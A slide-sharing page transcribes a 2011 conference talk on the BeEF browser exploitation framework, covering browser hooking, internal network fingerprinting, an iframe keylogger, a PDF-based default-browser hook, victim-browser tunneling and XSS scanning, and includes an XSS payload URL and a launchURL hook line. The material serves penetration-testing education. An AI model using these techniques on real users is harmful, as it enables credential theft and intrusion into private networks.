who am i
play

Who am I? Penetration Tester @ The Royal Bank of Scotland BeEF - PowerPoint PPT Presentation

Jan 16, 2024 •161 likes •497 views

Ground BeEF : Cutting, devouring and digesting the legs off a browser Michele antisnatchor Orru 6 September 2011 Who am I? Penetration Tester @ The Royal Bank of Scotland BeEF developer: Tunneling Proxy, XssRays integration,

  1. Ground BeEF : Cutting, devouring and digesting the legs off a browser Michele „antisnatchor” Orru’ 6 September 2011

  2. Who am I? ✴ Penetration Tester @ The Royal Bank of Scotland ✴ BeEF developer: Tunneling Proxy, XssRays integration, various exploits, lot of bug-fixing, testing and fun ✴ Kubrick fan ✴ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ✴ @antisnatchor ✴ http://antisnatchor.com

  3. Outline ✴ What the hell is BeEF? ✴ Cutting Target enumeration and analysis ✴ Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴ Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴ Future development and ideas

  4. What the hell is BeEF? ✴ BeEF: Browser Exploitation Framework ✴ Pioneered by Wade Alcorn in 2005 (public release) ✴ Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ✴ Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ✴ The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.

  5. What the hell is BeEF?

  6. Cutting: Target enum and analysis ✴ Lot of juicy information after first hook initialization : ✴ Browser/OS version ✴ Cookies ✴ Browser plugins ✴ Supported features (Google Gears, Web Sockets, Flash, Java, . .) ✴ Specific modules are also there to help ✴ Detect links/visited URLs ✴ Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ✴ Execute your custom Javascript

  7. Cutting: Target enum and analysis

  8. Devouring: Internal net fingerprint Recon/NetworkFingerprinting module ✴ Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. ✴ The approach currently in use is similar to Yokoso (InGuardians) ✴ Map of device/application default images ✴ img tags are loaded into the victim DOM ✴ Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found ✴ Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... ” on Vimeo (http://vimeo.com/24410203) for a practical example

  9. Devouring: Internal net fingerprint ✴ Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ✴ They developed new BeEF modules ✴ They are working with us and their work will be available in BeEF trunk soon. A few examples: ✴ Internal DNS enumeration ✴ Reliable Port Scanning ✴ Ping sweep

  10. Devouring: exploiting internal services ✴ Network/JbossJmxUploadExploit module ✴ JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) ✴ Then why not use the victim browser as a pivot?

  11. Devouring: persistent keylogging Persistence/iFrameKeylogger module ✴ We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ✴ After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.

  12. Devouring: module autorun ✴ We’ve ported back (from the old PHP version) the autorun feature ✴ Add autorun: true in the command module config.yaml that you want to autorun ✴ When a new browser will be hooked in BeEF, the module will be automatically launched ✴ Imagine adding autorun: true in Metasploit autopwn module (another feature ported back)...

  13. Digesting: hook default browser ✴ Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface” Browser/HookDefault module ✴ We use a PDF in order to attempt hooking the default browser ✴ When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ✴ app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true); ✴ If everything will be ok, we hooked the default browser. ✴ We are planning to improve it: ✴ make the bounce page configurable by the user ✴ use a ruby PDF library in order to manipulate the PDF via the web UI

  14. Digesting: tunneling proxy ✴ Having a communication channel with the hooked browser, we can: ✴ Receive requests as a proxy on BeEF ✴ Translate these requests to XHRs (in-domain) ✴ Parse the XHRs responses and send the data back to the original requestor... ✴ Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ✴ browsing the authenticated surface of the hooked domain through the security context of the victim browser; ✴ spidering the hooked domain through the security context of the victim browser; ✴ finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).

  15. Digesting: tunneling proxy Let see the tunneling proxy in action!

  16. Digesting: XssRays ✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ✴ What XssRays do is basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path. ✴ The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ✴ This is now patched by all recent browsers. So how to check for XSSs cross-domain, respecting the SOP restrictions?

  17. Digesting: XssRays ✴ We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). ✴ No false positives (oh yes, that’s what I like)! ✴ Basically the document.location.href of the injected iFrame that contains the vector will point to a know BeEF resource. The following is an example value of href: ✴ http://192.168.84.1:3000/ui/xssrays/rays? hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk 9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name= %22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection %20double&method=GET ✴ Next step is multihooking: hook a browser on multiple domains, to extend the attack surface.

  18. Digesting: XssRays in a nutshell

  19. Digesting: XssRays in a nutshell

  20. Digesting: XssRays in a nutshell

  21. Digesting: XssRays in a nutshell

  22. Digesting: XssRays in a nutshell

  23. Digesting: XssRays in a nutshell

  24. Digesting: XssRays in a nutshell

  25. Digesting: XssRays in a nutshell

  26. Digesting: XssRays in a nutshell

  27. Digesting: XssRays in a nutshell

  28. Digesting: XssRays in a nutshell

  29. Future dev and ideas ✴ Improve XssRays: ✴ add more attack vectors, more testing ✴ add JS depth crawler ✴ Multi-hooking: a browser can be hooked on multiple domains ✴ Check for time-based blind SQLi cross-domain via JS ✴ Improve the BeEF console (command line UI) ✴ Well...take a look here: http://code.google.com/p/beef/issues/list

  30. Get in touch with us ✴ Follow the BeEF: @beefproject ✴ Checkout BeEF: http://code.google.com/p/beef/ ✴ Check our website: http://beefproject.com ✴ Have fun with it ✴ We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)

  31. Thanks to ✴ Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ✴ My colleagues Piotr & Michal ✴ My employer ✴ SecurityByte crew and you attendees

  32. Questions? Thanks for your time guys ;-)

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

The Intersection of Application and Security Architecture Through the lens of distributed

The Intersection of Application and Security Architecture Through the lens of distributed

The Intersection of Application and Security Architecture Through the lens of distributed systems Walt Williams Who is this bloke? Author of Security for Service Oriented Architecture, CRC press 2014 Director of Information Security,

1.12k views • 55 slides
Security Testing - Where Automation Fails Today How does security testing of web

Security Testing - Where Automation Fails Today How does security testing of web

Security Testing - Where Automation Fails Today How does security testing of web applications work What does the tooling landscape look like How does automated security testing fail What can we do Image courtesy of

583 views • 56 slides
WhatsApp End-to-End Encryption: Are Our Messages Private? Supervisors: Research project by:

WhatsApp End-to-End Encryption: Are Our Messages Private? Supervisors: Research project by:

WhatsApp End-to-End Encryption: Are Our Messages Private? Supervisors: Research project by: Pavlos Lontorfos Ruben De Vries Soufiane el Aissaoui Tom Carpaij 1 Introduction 2 Introduction 1.5 billion users Black box

979 views • 40 slides
Acknowledgements Ed Lider (USFS Retired) Meeting Water Quality EPA: Don Martin, Leigh

Acknowledgements Ed Lider (USFS Retired) Meeting Water Quality EPA: Don Martin, Leigh

11/16/2011 Acknowledgements Ed Lider (USFS Retired) Meeting Water Quality EPA: Don Martin, Leigh Woodruff, Eric Monschein Goals in North Fork CDA DEQ: Tom Herron, Bob Steed, Tyson Clyne, Kristin Subbasin Streams? Keith, Marti Bridges,

63 views • 4 slides
Fourth Q Quarter and Fiscal Year 2 2019 E Earnings March 5, 2020 Cautionary Notes This

Fourth Q Quarter and Fiscal Year 2 2019 E Earnings March 5, 2020 Cautionary Notes This

Fourth Q Quarter and Fiscal Year 2 2019 E Earnings March 5, 2020 Cautionary Notes This presentation contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. All statements other than

312 views • 27 slides
Brewing Kombucha What is Kombucha (pronounced kom-BOO- cha)? In basic terms,

Brewing Kombucha What is Kombucha (pronounced kom-BOO- cha)? In basic terms,

Brewing Kombucha What is Kombucha (pronounced kom-BOO- cha)? In basic terms, Kombucha is fermented sweet tea. Often called mushroom tea, it is a fermented beverage made from black or green tea, sugar and a fungus

370 views • 17 slides
Capital Region Citizens Coalition for the Protection of the

Capital Region Citizens Coalition for the Protection of the

Capital Region Citizens Coalition for the Protection of the Environment CRCCPE May 2014 Federation of Urban Neighbourhoods (Ontario) F.U.N

424 views • 15 slides
Continued Concern rns Surro rrounding DEC Application ID# ID#0-9999 9999-00075/ 00075/00001

Continued Concern rns Surro rrounding DEC Application ID# ID#0-9999 9999-00075/ 00075/00001

Continued Concern rns Surro rrounding DEC Application ID# ID#0-9999 9999-00075/ 00075/00001 00001 (Carg rgill Mine Shaft #4) 4) May 1 st 2017 2:30PM 4:00 PM Photo: Bill Hecht 1 Thank you Introductions Dale Baker

398 views • 24 slides
Security Champions Only YOU Can Prevent File Forgery! Marisa Fagan at QCon London 2018 Agenda

Security Champions Only YOU Can Prevent File Forgery! Marisa Fagan at QCon London 2018 Agenda

Security Champions Only YOU Can Prevent File Forgery! Marisa Fagan at QCon London 2018 Agenda Who am I? Whats a Security Champion? What can YOU do as the lone champion? What can your company do to support YOU? Takeaways

637 views • 17 slides
Deepwater Drilling Risk Mitigation and Safety August 11, 2010 Outline Risk Mitigation

Deepwater Drilling Risk Mitigation and Safety August 11, 2010 Outline Risk Mitigation

Deepwater Drilling Risk Mitigation and Safety August 11, 2010 Outline Risk Mitigation Commence Additional Deepwater Operation in the GOM Brief Overview of Different Drilling Operations Exploration Drilling Appraisal /

486 views • 14 slides
(Video credit: NASA's Goddard Space Flight Center) Meng Su Collaborators: Douglas P.

(Video credit: NASA's Goddard Space Flight Center) Meng Su Collaborators: Douglas P.

(Video credit: NASA's Goddard Space Flight Center) Meng Su Collaborators: Douglas P. Finkbeiner, Tracy R. Slatyer Harvard University Jet 2012, NRAO, Charlottesville 2012.03.04 Fermi Bubbles Giant gamma-ray structure with sharp edges

977 views • 55 slides
Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E.

Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E.

Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E. Simos SBA Research Applied & Computational Mathematics Division Seminar Series National Institute of Standards and Technology (NIST) Gaithersburg,

675 views • 50 slides
The above pictures are from Jawalakhel, in front of a complex and opposite to Staff College. The

The above pictures are from Jawalakhel, in front of a complex and opposite to Staff College. The

Hacking Fiber optics easier than copper cable Sachin Jung Karki Freelance IT Security professional February 1, 2016 You know that your copper-wired networks and wireless LANs can be sniffed and that your data can be compromised. But fiber-optic

272 views • 6 slides
Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi From Myself Associate Professor at UiO Teaching Ethical Hacking since 2012 Lecturer of the IN5290 Ethical Hacking at UiO Leader

878 views • 66 slides
Secure Web Application Development METHODOLOGIES AND AUTOMATED TOOLS MURAT KAYA SOFTWARE

Secure Web Application Development METHODOLOGIES AND AUTOMATED TOOLS MURAT KAYA SOFTWARE

Secure Web Application Development METHODOLOGIES AND AUTOMATED TOOLS MURAT KAYA SOFTWARE SECURITY SPECIALIST Agenda Software Security Overview Software Security Methodologies Security Test Methods Analysis Tools Tools

497 views • 25 slides
SIBUR FIELD TRIP: TOBOLSK PRODUCTION SITE 3-4 October 2013 DISCLAIMER The information contained

SIBUR FIELD TRIP: TOBOLSK PRODUCTION SITE 3-4 October 2013 DISCLAIMER The information contained

SIBUR FIELD TRIP: TOBOLSK PRODUCTION SITE 3-4 October 2013 DISCLAIMER The information contained herein pertaining to SIBUR (the "Company") has been provided by the Company solely for use at this presentation. By attending this

601 views • 34 slides
Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA @ivRodriguezCA DISCLAIMER

Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA @ivRodriguezCA DISCLAIMER

Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA @ivRodriguezCA DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA

1.18k views • 82 slides
Multiple mating of female Dioryctria in British Columbia conifer seed orchards Jason Dombrowski

Multiple mating of female Dioryctria in British Columbia conifer seed orchards Jason Dombrowski

Multiple mating of female Dioryctria in British Columbia conifer seed orchards Jason Dombrowski Jason Dombrowski Caroline Whitehouse, Ward Strong and Maya Evenden Multiple mating theory Levels of polyandry can vary widely among and within

268 views • 16 slides
Dont Cut The Rotator Cuff: Maintain It, Repair In-Situ: Results are Spectacular Larry D.

Dont Cut The Rotator Cuff: Maintain It, Repair In-Situ: Results are Spectacular Larry D.

Dont Cut The Rotator Cuff: Maintain It, Repair In-Situ: Results are Spectacular Larry D. Field, M.D. Mississippi Sports Medicine and Orthopaedic Center Jackson, Mississippi Disclosures The following relationships exist: 1.Royalties

672 views • 22 slides
OIE standards related related to to OIE standards trade and and poultry poultry diseases

OIE standards related related to to OIE standards trade and and poultry poultry diseases

OIE standards related related to to OIE standards trade and and poultry poultry diseases diseases trade Poultry in the 21 st Century Bangkok, 5-7 November 2007 Dr Christianne Bruschke Scientific and Technical Department OIE Standards for

186 views • 14 slides
KOALAS IN THE WIDE BAY BURNETT Wildcare Australia & Wildlife Rescue Fraser Coast Joint

KOALAS IN THE WIDE BAY BURNETT Wildcare Australia & Wildlife Rescue Fraser Coast Joint

KOALAS IN THE WIDE BAY BURNETT Wildcare Australia & Wildlife Rescue Fraser Coast Joint Presentation Our organisations Overview of Rehabilitation Causes and Issues Statistics on Koala Rescues in Wide Bay Burnett / BMRG Region

710 views • 70 slides
Eggs In NZ History Arrived with Captain cook 1780s Household backyard to Farms In

Eggs In NZ History Arrived with Captain cook 1780s Household backyard to Farms In

Eggs In NZ History Arrived with Captain cook 1780s Household backyard to Farms In 2016 New Zealand had some 146 commercial egg producers, with the largest 6 companies accounting for over 75% of total production. An estimated

534 views • 41 slides
History the Athlete Was there an injury? Pain Duration Location Type

History the Athlete Was there an injury? Pain Duration Location Type

12/9/2013 Diagnosis and Treatment of Hip Pain in History the Athlete Was there an injury? Pain Duration Location Type Better/Worse Severity Subjective Jonathan M. Fallon, D.O., M.S. assessment Shoulder Surgery and

467 views • 10 slides
Annual Saskatchewan Prayer Breakfast Wednesday April 15, 2009 Presentation by Heather Kuttai

Annual Saskatchewan Prayer Breakfast Wednesday April 15, 2009 Presentation by Heather Kuttai

Annual Saskatchewan Prayer Breakfast Wednesday April 15, 2009 Presentation by Heather Kuttai Whenever I start a speech, I like to tell my audience this: although I have had the opportunity to travel through sport all over the world and

508 views • 5 slides

More recommend